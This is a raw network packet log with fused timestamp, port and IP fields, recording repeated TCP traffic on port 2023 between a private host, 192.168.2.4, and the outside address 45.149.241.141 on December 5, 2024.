                                                                                                                  Dec 5, 2024 10:46:39.464723110 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.464740992 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.464782000 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.465727091 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.465867996 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.465915918 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.466927052 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.467139006 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.467211962 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.468142033 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.468200922 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.468246937 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.469347954 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.469566107 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.469616890 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.470303059 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.470379114 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.470426083 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.471457958 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.471571922 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.471617937 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.472590923 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.472810030 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.472876072 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.473716021 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.473845005 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.473887920 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.474884987 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.475008965 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.475053072 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.475986958 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.476063967 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.476109028 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.477284908 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.477437019 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.477475882 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.478573084 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.478682041 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.478727102 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.479706049 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.479768038 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.479810953 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.480550051 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.480665922 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.480710030 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.481715918 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.481820107 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.481863976 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.483076096 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.483161926 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.483202934 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.484152079 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.484255075 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.484303951 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.485088110 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.485213995 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.485255957 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.486314058 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.486397028 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.486445904 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.487443924 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.487549067 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.487586021 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.488615990 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.488734007 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.488773108 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.489908934 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.489998102 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.490046024 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.490900040 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.491110086 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.491157055 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.492528915 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.492547989 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.492587090 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.493465900 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.493566036 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.493613005 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.494379044 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.494426012 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.494465113 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.495383024 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.495520115 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.495569944 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.496613026 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.496793985 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.496846914 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.497760057 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.497837067 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.497884989 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.498943090 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.498960972 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.499007940 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.500031948 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.500051022 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.500102043 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.501077890 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.501164913 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.501210928 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.502274990 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.502372026 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.502420902 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.503456116 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.503860950 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.503912926 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.504976988 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.505136967 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.505187035 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.506108999 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.506175995 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.506217003 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.507220030 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.507366896 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.507414103 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.508304119 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.555305958 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.640526056 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.640549898 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.640671968 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.640964031 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.641076088 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.641124010 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.642147064 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.642227888 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.642275095 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.643527031 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.643584013 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.643635988 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.644757032 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.644768953 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.644831896 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.645724058 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.645757914 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.645807028 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.646852016 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.646985054 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.647034883 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.647923946 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.648030043 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.648075104 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.649068117 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.649193048 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.649233103 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.650122881 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.650182009 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.650226116 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.651127100 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.651262045 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.651304960 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.652515888 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.652626038 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.652672052 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.653810024 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.653959036 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.654006004 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.655013084 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.655178070 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.655225992 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.656007051 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.656105042 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.656151056 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.656996012 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.657123089 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.657201052 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.657948971 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.658080101 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.658123016 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.658974886 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.659121990 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.659163952 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.660090923 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.660181046 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.660223007 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.661163092 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.661257029 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.661294937 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.662357092 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.662565947 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.662614107 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.663415909 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.663561106 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.663606882 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.664788008 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.665010929 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.665054083 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.665993929 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.666107893 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.666158915 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.666687012 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.666740894 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:39.786818981 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:39.786834955 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:54.472196102 CET497482023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:54.592026949 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:54.592119932 CET497482023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:54.592331886 CET497482023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:54.713567019 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:55.836173058 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:55.836191893 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:55.836869001 CET497482023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:55.907026052 CET497482023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:56.026870966 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:56.308403969 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:56.310278893 CET497482023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:56.430041075 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:56.774389029 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:56.777365923 CET497482023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:56.897036076 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:56.897169113 CET497482023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:57.017240047 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:57.302440882 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:57.305222034 CET497482023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:57.425234079 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:57.425298929 CET497482023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:57.545263052 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:57.831556082 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:57.831574917 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:57.831826925 CET497482023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:57.863981009 CET497482023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:57.864166975 CET497482023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:57.864166975 CET497482023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:57.865561008 CET497482023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:57.983795881 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:57.984018087 CET497482023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:57.984028101 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:57.984040976 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:57.984106064 CET497482023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:57.984225988 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:57.984236002 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:57.984345913 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:57.984365940 CET497482023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:57.984615088 CET497482023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:57.984693050 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:57.984703064 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:57.984711885 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:57.984771967 CET497482023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:57.984771967 CET497482023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:57.985394955 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:57.985405922 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:57.985485077 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:57.985495090 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:57.985519886 CET497482023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:57.985622883 CET497482023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:58.103780985 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:58.103909016 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:58.103919983 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:58.103948116 CET497482023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:58.103970051 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:58.103981018 CET497482023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:58.104051113 CET497482023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:58.104172945 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:58.104300976 CET497482023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:58.104410887 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:58.104496002 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:58.104588032 CET497482023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:58.104680061 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:58.104825020 CET497482023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:58.105279922 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:58.105421066 CET497482023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:58.105432034 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:58.105442047 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:58.105447054 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:58.105554104 CET497482023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:58.224052906 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:58.224339008 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:58.224378109 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:58.224642038 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:58.224652052 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:58.224694967 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:58.225018024 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:58.225297928 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:58.225337029 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:58.225415945 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:58.225425005 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:58.225457907 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:58.225481987 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:58.225503922 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:58.225589037 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:58.225598097 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:58.225630045 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:58.722003937 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:58.765985966 CET497482023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:58.837287903 CET497482023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:58.837372065 CET497482023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:58.837435007 CET497482023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:58.957282066 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:58.957298040 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:58.957318068 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:58.957328081 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:58.957341909 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:58.957353115 CET497482023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:58.957636118 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:58.957658052 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:58.957668066 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:58.957676888 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:59.077121973 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:59.368833065 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:59.381782055 CET497482023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:59.381886959 CET497482023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:59.381922960 CET497482023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:59.382035017 CET497482023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:59.382070065 CET497482023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:59.501714945 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:59.501730919 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:59.501755953 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:59.501765966 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:59.501868963 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:59.501878977 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:59.501983881 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:59.502002954 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:59.502229929 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:59.502281904 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:59.502321005 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:59.502604961 CET20234974845.149.241.141192.168.2.4
